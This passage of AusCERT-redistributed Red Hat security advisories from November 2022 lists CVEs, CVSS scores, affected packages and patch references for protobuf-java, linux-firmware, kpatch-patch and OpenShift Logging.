* protobuf-java: timeout in parser leads to DoS (CVE-2022-3171)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
3. Solution:
To apply this update just follow standard installation procedure
https://access.redhat.com/documentation/en-us/red_hat_integration/2022.q4/html/installing_debezium_on_openshift/index
https://access.redhat.com/documentation/en-us/red_hat_integration/2022.q4/html/installing_debezium_on_rhel/index
4. Bugs fixed (https://bugzilla.redhat.com/):
2039903 - CVE-2021-22569 protobuf-java: potential DoS in the parsing procedure for binary data
2137645 - CVE-2022-3171 protobuf-java: timeout in parser leads to DoS
5. References:
https://access.redhat.com/security/cve/CVE-2021-22569
https://access.redhat.com/security/cve/CVE-2022-3171
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=red.hat.integration&version=2022-Q4
6. Contact:
The Red Hat security contact is . More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBY2v3otzjgjWX9erEAQhmmw/+NujxA03qhV4k8/pvL88Dazs3bt6ZH8ar
ELY1Ueri1EgfWROfGB2+SKK2hbFNN+ft4iY2YWHhDX6PUAmVMPiaB0M8NCQkj7GW
17Bo/muRWOti78J03+2314VxLwNHn+s2qCtAR3/Ks4bfcEDUMwsy/u3YTs+wtbK5
tvO5s6uUPB2evIlliJuYKVfUFB9R900tZv44JZ2d+PC3R4S+dUcVTASRX8lDQMhx
lOSxVePvV1rNTBJ0e7GaPCWNHR2eNSewpwI/XLhfBOh7ojIgNDUNCi69aEYyVLHW
R7uh5R3+PFZvQX+mJ74qcQV2aYVQ4MnhKZrWqbkGyhMqHVRuF7d6DzXd2yMWVDWk
vjgnu2NHR0SG/uRdA2Iykm0MGCq9/69KTo3C+nFEoDNg2vVdH155IInpAdpiw/zn
iKOXcdQkrLyvClNz/giifooNm9/8HSYhI26ayOj/t+H0AGQfAGLfVHGbNQJ7y00W
tSU1OfNPU53KCvbIk/l/3H4SOeXPbOb5pgXaEOM+8ssPk48aBSkQ5Ru7HrJOZwYY
fU3652+qceb/IAWoHsGfW2UKOOLeyipD9i4rxhKaAQYtOsETGAoeqxF43e78VFBy
y47unTuLhi0DyhZw+ZPKzit3j4VLTUTrB79JxyZQ+WZYXOU/ZUpwSkRwMqwjMm9Q
+d4cGdgfQ7Y=
=3CJ6
- -----END PGP SIGNATURE-----
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yLHMkNZI30y1K9AQiw5RAAoRK6satPQGgjf8HpZIBGNL/cGgBkcyTY
wTEOQBKpZacD5vkr3rNt/QHoYgzuaF0r6xK/5hMMr+O12ReoRO1neiCaMMjLXE1I
UMJtcWgdOS3lrpbBHqtyRmvYmWl2WesYnSoi1HsPARB9s1Tc94oxcVqfVbeF58nS
dLtAB6YwR71CjJ+OLzh4YAmZHdKdi/u5iQTXd/y2tb1BwTPz28zCn0+rEFR+90dm
/gubvs6dTWJ6I9QxsloJGnbWj0UhqxSReq+JCKydtm6mmjRO+lPQ/LcKXg/VVat3
/tMd7wCznu0qoP+qc77KjGtUNsqWD047f5nADD5UOtyN4kfe4QvvzevSaqfu2bou
dKZNeLGGcP7TfkFYRiTcE5MAymMnfrB42gSBlsaE1dv8O4bsntND211Zc++8MtWr
kpAX7egSGvRSd27j2i9E4rUInZpPii683zJp7pmn/efHN5g6vTWs+OTCaMtTC5Cs
/tLtqpRozK2ZIk7f5ExCbpan6jaXaRLc3hAlBA+PfoQvAzb54d+CV/QtsqPMRhUG
SeAPUyPaferiWJpVh1VUNXW7oFkKib7WYEW5Si6jqfCt3bNGFMDmd7mgRNHqrkfr
EdJJt1OOXVmD8lqjbr/zKcyRzCGoK9f/is9DBVca9BN58MgVTm5io90QbsAzvoaj
mzg0DmVMWr4=
=runc
-----END PGP SIGNATURE-----
ESB-2022.5787 - [RedHat] linux-firmware: CVSS (Max): 8.8
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5787
linux-firmware security update
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: linux-firmware
Publisher: Red Hat
Operating System: Red Hat
Resolution: Patch/Upgrade
CVE Names: CVE-2020-12321
Original Bulletin:
https://access.redhat.com/errata/RHSA-2022:7887
Comment: CVSS (Max): 8.8 CVE-2020-12321 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS Source: Red Hat
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Important: linux-firmware security update
Advisory ID: RHSA-2022:7887-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2022:7887
Issue date: 2022-11-09
CVE Names: CVE-2020-12321
=====================================================================
1. Summary:
An update for linux-firmware is now available for Red Hat Enterprise Linux
7.7 Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended
Update Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP
Solutions.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Server AUS (v. 7.7) - noarch
Red Hat Enterprise Linux Server E4S (v. 7.7) - noarch
Red Hat Enterprise Linux Server TUS (v. 7.7) - noarch
3. Description:
The linux-firmware packages contain all of the firmware files that are
required by various devices to operate.
Security Fix(es):
* hardware: buffer overflow in bluetooth firmware (CVE-2020-12321)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1893914 - CVE-2020-12321 hardware: buffer overflow in bluetooth firmware
6. Package List:
Red Hat Enterprise Linux Server AUS (v. 7.7):
Source:
linux-firmware-20190429-73.gitddde598.el7_7.src.rpm
noarch:
iwl100-firmware-39.31.5.1-73.el7_7.noarch.rpm
iwl1000-firmware-39.31.5.1-73.el7_7.noarch.rpm
iwl105-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl135-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl2000-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl2030-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl3160-firmware-22.0.7.0-73.el7_7.noarch.rpm
iwl3945-firmware-15.32.2.9-73.el7_7.noarch.rpm
iwl4965-firmware-228.61.2.24-73.el7_7.noarch.rpm
iwl5000-firmware-8.83.5.1_1-73.el7_7.noarch.rpm
iwl5150-firmware-8.24.2.2-73.el7_7.noarch.rpm
iwl6000-firmware-9.221.4.1-73.el7_7.noarch.rpm
iwl6000g2a-firmware-17.168.5.3-73.el7_7.noarch.rpm
iwl6000g2b-firmware-17.168.5.2-73.el7_7.noarch.rpm
iwl6050-firmware-41.28.5.1-73.el7_7.noarch.rpm
iwl7260-firmware-22.0.7.0-73.el7_7.noarch.rpm
iwl7265-firmware-22.0.7.0-73.el7_7.noarch.rpm
linux-firmware-20190429-73.gitddde598.el7_7.noarch.rpm
Red Hat Enterprise Linux Server E4S (v. 7.7):
Source:
linux-firmware-20190429-73.gitddde598.el7_7.src.rpm
noarch:
iwl100-firmware-39.31.5.1-73.el7_7.noarch.rpm
iwl1000-firmware-39.31.5.1-73.el7_7.noarch.rpm
iwl105-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl135-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl2000-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl2030-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl3160-firmware-22.0.7.0-73.el7_7.noarch.rpm
iwl3945-firmware-15.32.2.9-73.el7_7.noarch.rpm
iwl4965-firmware-228.61.2.24-73.el7_7.noarch.rpm
iwl5000-firmware-8.83.5.1_1-73.el7_7.noarch.rpm
iwl5150-firmware-8.24.2.2-73.el7_7.noarch.rpm
iwl6000-firmware-9.221.4.1-73.el7_7.noarch.rpm
iwl6000g2a-firmware-17.168.5.3-73.el7_7.noarch.rpm
iwl6000g2b-firmware-17.168.5.2-73.el7_7.noarch.rpm
iwl6050-firmware-41.28.5.1-73.el7_7.noarch.rpm
iwl7260-firmware-22.0.7.0-73.el7_7.noarch.rpm
iwl7265-firmware-22.0.7.0-73.el7_7.noarch.rpm
linux-firmware-20190429-73.gitddde598.el7_7.noarch.rpm
Red Hat Enterprise Linux Server TUS (v. 7.7):
Source:
linux-firmware-20190429-73.gitddde598.el7_7.src.rpm
noarch:
iwl100-firmware-39.31.5.1-73.el7_7.noarch.rpm
iwl1000-firmware-39.31.5.1-73.el7_7.noarch.rpm
iwl105-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl135-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl2000-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl2030-firmware-18.168.6.1-73.el7_7.noarch.rpm
iwl3160-firmware-22.0.7.0-73.el7_7.noarch.rpm
iwl3945-firmware-15.32.2.9-73.el7_7.noarch.rpm
iwl4965-firmware-228.61.2.24-73.el7_7.noarch.rpm
iwl5000-firmware-8.83.5.1_1-73.el7_7.noarch.rpm
iwl5150-firmware-8.24.2.2-73.el7_7.noarch.rpm
iwl6000-firmware-9.221.4.1-73.el7_7.noarch.rpm
iwl6000g2a-firmware-17.168.5.3-73.el7_7.noarch.rpm
iwl6000g2b-firmware-17.168.5.2-73.el7_7.noarch.rpm
iwl6050-firmware-41.28.5.1-73.el7_7.noarch.rpm
iwl7260-firmware-22.0.7.0-73.el7_7.noarch.rpm
iwl7265-firmware-22.0.7.0-73.el7_7.noarch.rpm
linux-firmware-20190429-73.gitddde598.el7_7.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2020-12321
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is . More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBY2ujQ9zjgjWX9erEAQhqAw/+OphS9QKDHty/D7XjsP5WK5u+a6Ri3DlS
egdW3yP+wu+9QYeaIvLivGs3JBZdyI538dCEzfWS6ePy6czEqrjKYznkiqqvv1Wl
dbrgJEo5F8KMVWjOs2HtRHmM6kf8T9OpWx2S82W9K/K/4UYYAKTZNNzsdWcrU2Bk
j9dCFcfbjkpexoJoobLW1PHaYPLtmvRsQAZPGbkTHnCyvWPRlqtvXkFB9O/fCSDB
T+w2Dn8DnJCwfbj16wi6BA8je8ZL4mBSR5vh/Uie1B7bRnuHWoG5qBZaBYubawB1
BK/ztdtqy9gLGVHTFTf0KygMXhSFpv0ef+5MT1ZsQoDOGrBlKC/fXVUUQWmaG0hN
4lFqTwgSO83cxt13rfglXXMkTipMTIXJ//kOO5Ko2yrRR2UFMgjnAlaMKzyxSmvf
uNBX4JjhdUhWzDesAr7HD9B0pMnHJA8rZqr24QVOHSvK5SmbELyU1YAr2p892QHM
f6RzWQeVUZKHrOItjxlRil6RISUVhJD8qq57/J7POpBFLmSipv58J0/jfLevtzcK
e7OrIhkkKHir1od+uELDsKZwdlm3Dr3XwIh8RKGpsNqk9xk+EC3zNdDEAtTXn0MV
dTVnV8jIGFyDRmI4NMMj1Op52aj3keA5sfHW5UyMNYEwpCFzsHTxImoBq0ueBjO5
C+EAysMTcQM=
=W/2L
- -----END PGP SIGNATURE-----
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yLD8kNZI30y1K9AQgdtg/9EvT7shtEzLmYy/uJTceAKQdLN3VsR9wN
hu6Aj83Ivdql/STm+bni9YmWjdgy6EZhFB4MYXGXOn9bM5x3aW7OKHDLSh5mGr0D
hgYt/dG8pJ8TR3u0WWNwYctM2zIuryR67+5k6GQHMlXku3IOm/IGWnajNDsNEcdH
hV4pC65oVZnVL4xoUkiOtqJ5ANQ253/174qunFw2HZWYDxfTyY4+cfCFjrH9oIJA
CkAf1uP+zecr+5a/hpn9FZbKx8YL8kRAqpprc7pxOXbMp8mLjDqW6yG3nN2aOZ7y
PtC6RA2YkQQ71NGXQXgLaRNncouGObGHW0UKbmM9Rq2sgz3C59u4kzEDZSuyLBaV
333TWuOPI0Oiv5ZaegFmNlbpnMeMjZYZ4+BFqt78OgCnYS7/8dHy7QjVHA2kf+sq
eFaVCTmHqpTgDDI1vwqxGT2bp8vr/WKGYhmq992O95FTWjlJ5Em6olsONlX+iWrq
9AZSqXzSk4eHrmlKuTpfepFXKSMRHNkRNRrhMXPR27yNUcWb7Q9h9TDGJ2lDIByC
OqDflvSNbb/tI+F1+d8JelDpOB/hN234XS5p5p69H6RWobRZIDdn3MFmKbVucoAZ
9zY72AICaqmPW61/Z6c6UCh0ccZUgMaQX+0cOD20aPrZoCCudvWh6E4+GhCdYwqS
JIc9Jn+oIXQ=
=dxnV
-----END PGP SIGNATURE-----
ESB-2022.5786 - [RedHat] kpatch-patch: CVSS (Max): 7.8
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5786
kpatch-patch security update
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: kpatch-patch
Publisher: Red Hat
Operating System: Red Hat
Resolution: Patch/Upgrade
CVE Names: CVE-2022-2588
Original Bulletin:
https://access.redhat.com/errata/RHSA-2022:7885
Comment: CVSS (Max): 7.8 CVE-2022-2588 (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CVSS Source: Red Hat
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Important: kpatch-patch security update
Advisory ID: RHSA-2022:7885-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2022:7885
Issue date: 2022-11-09
CVE Names: CVE-2022-2588
=====================================================================
1. Summary:
An update for kpatch-patch is now available for Red Hat Enterprise Linux
8.2 Update Services for SAP Solutions.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - ppc64le, x86_64
3. Description:
The kpatch management tool provides a kernel patching infrastructure which
allows you to patch a running kernel without rebooting or restarting any
processes.
Security Fix(es):
* kernel: a use-after-free in cls_route filter implementation may lead to
privilege escalation (CVE-2022-2588)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
2114849 - CVE-2022-2588 kernel: a use-after-free in cls_route filter implementation may lead to privilege escalation
6. Package List:
Red Hat Enterprise Linux BaseOS E4S (v. 8.2):
Source:
kpatch-patch-4_18_0-193_80_1-1-2.el8_2.src.rpm
kpatch-patch-4_18_0-193_81_1-1-2.el8_2.src.rpm
kpatch-patch-4_18_0-193_87_1-1-1.el8_2.src.rpm
kpatch-patch-4_18_0-193_90_1-1-1.el8_2.src.rpm
kpatch-patch-4_18_0-193_91_1-1-1.el8_2.src.rpm
ppc64le:
kpatch-patch-4_18_0-193_80_1-1-2.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_80_1-debuginfo-1-2.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_80_1-debugsource-1-2.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_81_1-1-2.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_81_1-debuginfo-1-2.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_81_1-debugsource-1-2.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_87_1-1-1.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_87_1-debuginfo-1-1.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_87_1-debugsource-1-1.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_90_1-1-1.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_90_1-debuginfo-1-1.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_90_1-debugsource-1-1.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_91_1-1-1.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_91_1-debuginfo-1-1.el8_2.ppc64le.rpm
kpatch-patch-4_18_0-193_91_1-debugsource-1-1.el8_2.ppc64le.rpm
x86_64:
kpatch-patch-4_18_0-193_80_1-1-2.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_80_1-debuginfo-1-2.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_80_1-debugsource-1-2.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_81_1-1-2.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_81_1-debuginfo-1-2.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_81_1-debugsource-1-2.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_87_1-1-1.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_87_1-debuginfo-1-1.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_87_1-debugsource-1-1.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_90_1-1-1.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_90_1-debuginfo-1-1.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_90_1-debugsource-1-1.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_91_1-1-1.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_91_1-debuginfo-1-1.el8_2.x86_64.rpm
kpatch-patch-4_18_0-193_91_1-debugsource-1-1.el8_2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2022-2588
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is . More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBY2ujRtzjgjWX9erEAQgxZhAAj8EcB5GD5UdWVdH9s9UjFoyQdGq1apG4
Oc9Q3qq93YzUui9PdMeqsY9YIKDh/3N1f5QlLnHJKv2TBd+7IWowNGnxVfyL2Lht
YuCYE7PoQ0IIJ9d/XfXq56Z42EJTUCOG0In+pM3KAIs+rPwaKR+u0jEbMISQabDj
QAWuChE0qcsdz59+NYiDaDgYEQQQezj59pAuuuPC/W8PaGR93COJ611LWzmgDL+l
17lOs0FFvQe05SMNTSy6ofqfNAKbucQJC+80nmTnTlyMZ8unLa2WeZ1QtDLiDcML
F9lijF4qbMcXWzKbZrd378qmw5rkIt9ygrXrCpsqOr7MhsClgxdwQAvOC06lHlqk
XP7LWaasq7xqOFk5UihiVloCyxkURWL7uwaGfJzBvfPNnWyaRvVbTrYtimwKlAcc
XPEQHscMBOOVEoOCRxGy2V+HPEaGfhShDe0czPAdqF3CnX/qS13VLnbatj/qgRgz
eirLyBCij++lIvSwR17ngEov98kpu/OO+9bPl3pLMqQA6oAfjR1M17z5F/8Niv8k
nOfpTYbwZv+WR8Y6BJZgw+o6uX1yqZtCTW7qobLmASJB3o8Wq5yL+lytNXYVpKOf
cak4umPp3dtvNKpuQT9N3naMn3+DRrs9Lkd/RATTao5sGCO+nFpCsi2wm1vRvb+z
AF5BT2DqJ+o=
=1SyI
- -----END PGP SIGNATURE-----
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yK/ckNZI30y1K9AQhhhA/9GNv/HvDGAFadpQHXJ/u5OOjuffx69xJq
Vs3zskGacMvz9QGGnVgTZOV2s7YsWfSHq7mHKXGkUUJJjaSlgBiPIWxWvsBqgYCb
GJn8JuyFURkHM07a36dhyAoROk+vMri4bRTOoOc7NBizxL0J6Yvn1dx6ysgJPb65
7KrNR7jxWNUfW+bCJOGgnSrKf/3rDtvnbLeLvE3KqahHEC2iIQQ7oNk7JjrxwmW/
zqDNuBc7HExT+6EY20LP1EJ5raWUv7omBT0PKJLRhnWJFZIYDG8f98zv1UO+1XC/
Uf0mHERbNx5Y2ywAb5w1lSMioL11H3jA2ieSl09/JqxUHWjyfM1KJesLcHENvKTl
zGGMG8SbY3cFQJnEkZWWwoNZ/kzDPJpxR+DKhUYEBa7mPsYrt2njcy77+kLCRpvr
/5mzR5a3urN4sHJXdvEQXYVNZXP8v8iu5DXxm8tpmKuhToGbrQtE7waV5PMVvqiG
54cUF5HXMUR/hnq3XqmtfcTuEY5I29tpdGpNS+lelTSJbRSTgaN+AWLOLa3oy2BG
S+ATykPS6m/l5RJAzs/TN0JDUOYlHsFMdQtfD6Bj2qWPDl8+u41i0pgQviYICuX+
LRH5IXZnseAY+oGsjUnSo8lpOeqMoRuxooKE50pICj3FB1baOZZLAaUFurDjKalF
9AIaOk2Z/vE=
=VFK6
-----END PGP SIGNATURE-----
ESB-2022.5785 - [RedHat] OpenShift Logging: CVSS (Max): 9.8
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5785
Openshift Logging 5.3.13 security and bug fix release
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: OpenShift Logging
Publisher: Red Hat
Operating System: Red Hat
Resolution: Patch/Upgrade
CVE Names: CVE-2022-40674 CVE-2022-39399 CVE-2022-37434
CVE-2022-32149 CVE-2022-29901 CVE-2022-29900
CVE-2022-23825 CVE-2022-23816 CVE-2022-21628
CVE-2022-21626 CVE-2022-21624 CVE-2022-21619
CVE-2022-21618 CVE-2022-3515 CVE-2022-2588
CVE-2022-2509 CVE-2022-1353 CVE-2022-0494
CVE-2020-35527 CVE-2020-35525
Original Bulletin:
https://access.redhat.com/errata/RHSA-2022:6882
Comment: CVSS (Max): 9.8 CVE-2022-40674 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS Source: Red Hat
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: Openshift Logging 5.3.13 security and bug fix release
Advisory ID: RHSA-2022:6882-01
Product: Red Hat OpenShift Enterprise
Advisory URL: https://access.redhat.com/errata/RHSA-2022:6882
Issue date: 2022-11-09
CVE Names: CVE-2020-35525 CVE-2020-35527 CVE-2022-0494
CVE-2022-1353 CVE-2022-2509 CVE-2022-2588
CVE-2022-3515 CVE-2022-21618 CVE-2022-21619
CVE-2022-21624 CVE-2022-21626 CVE-2022-21628
CVE-2022-23816 CVE-2022-23825 CVE-2022-29900
CVE-2022-29901 CVE-2022-32149 CVE-2022-37434
CVE-2022-39399 CVE-2022-40674
=====================================================================
1. Summary:
An update is now available for OpenShift Logging 5.3.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Description:
Openshift Logging 5.3.13 security and bug fix release
Security Fix(es):
* golang: golang.org/x/text/language: ParseAcceptLanguage takes a long time
to parse complex tags (CVE-2022-32149)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
3. Solution:
For OpenShift Container Platform 4.9 see the following documentation, which
will be updated shortly, for detailed release notes:
https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html
For Red Hat OpenShift Logging 5.3, see the following instructions to apply
this update:
https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html
4. Bugs fixed (https://bugzilla.redhat.com/):
2134010 - CVE-2022-32149 golang: golang.org/x/text/language: ParseAcceptLanguage takes a long time to parse complex tags
5. References:
https://access.redhat.com/security/cve/CVE-2020-35525
https://access.redhat.com/security/cve/CVE-2020-35527
https://access.redhat.com/security/cve/CVE-2022-0494
https://access.redhat.com/security/cve/CVE-2022-1353
https://access.redhat.com/security/cve/CVE-2022-2509
https://access.redhat.com/security/cve/CVE-2022-2588
https://access.redhat.com/security/cve/CVE-2022-3515
https://access.redhat.com/security/cve/CVE-2022-21618
https://access.redhat.com/security/cve/CVE-2022-21619
https://access.redhat.com/security/cve/CVE-2022-21624
https://access.redhat.com/security/cve/CVE-2022-21626
https://access.redhat.com/security/cve/CVE-2022-21628
https://access.redhat.com/security/cve/CVE-2022-23816
https://access.redhat.com/security/cve/CVE-2022-23825
https://access.redhat.com/security/cve/CVE-2022-29900
https://access.redhat.com/security/cve/CVE-2022-29901
https://access.redhat.com/security/cve/CVE-2022-32149
